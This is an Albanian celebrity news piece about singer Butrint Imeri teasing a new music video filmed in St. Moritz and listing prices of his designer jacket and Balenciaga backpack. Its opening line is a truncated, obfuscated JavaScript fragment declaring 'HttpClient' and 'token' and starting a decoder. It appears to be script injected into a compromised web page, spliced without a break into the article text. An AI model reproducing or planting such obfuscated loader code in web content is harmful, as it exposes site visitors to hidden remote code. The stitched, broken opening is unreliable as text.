;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Butrinti po xhiron videoklip në një vend luksoz me një veshje shumë luksoze

By

Pas një viti tejet të suksesshëm me këngë të shndërruara në hite absolute, Butrint Imeri duket se nuk e ka ndërmend të ndalë ‘motorrët’.

Ai do të vazhdojë edhe përgjatë 2020-ës me të njejtin ritëm, në sjelljen e projekteve të reja muzikore.

Teksa shumë prej kolegëve të tij mund të jenë duke mbushur bateritë pas një viti të lodhshëm e me përplot angazhime, për Butrintin nuk ka ndalesa.

Ai ka tashmë gati projektin e tij më të ri, siç ka zbuluar përmes rrjeteve sociale ku ka postuar një fotografi me mbishkrimin: ‘Një tjetër. Së shpejti’.

View this post on Instagram

another one 🥶🔥 #comingsoon

A post shared by BUTRINT IMERI (@butrint_official) on

Butrinti ka menduar Saint Morritz, një prej resorteve më luksoze turistike në Europë ku zgjedhin të xhirojnë fare pak nga estrada shqiptare, për të mos thënë askush tjetër.

Si e tillë edhe veshja e tij ‘dimërore’ kushton mijëra euro. Bazur në postimin e @what.they.wearin në llogarinë e tyre në Instagram, Butrinti ka veshur një xhaketë nga Hero Preston “Nasa Down Jacket” që kushton 1,330 Euro dhe cantë krahu nga Balenciaga “Logo Fur Backpack” që kushton 1,390 Euro. /Prive.al

 

Artikuj të ngjashëm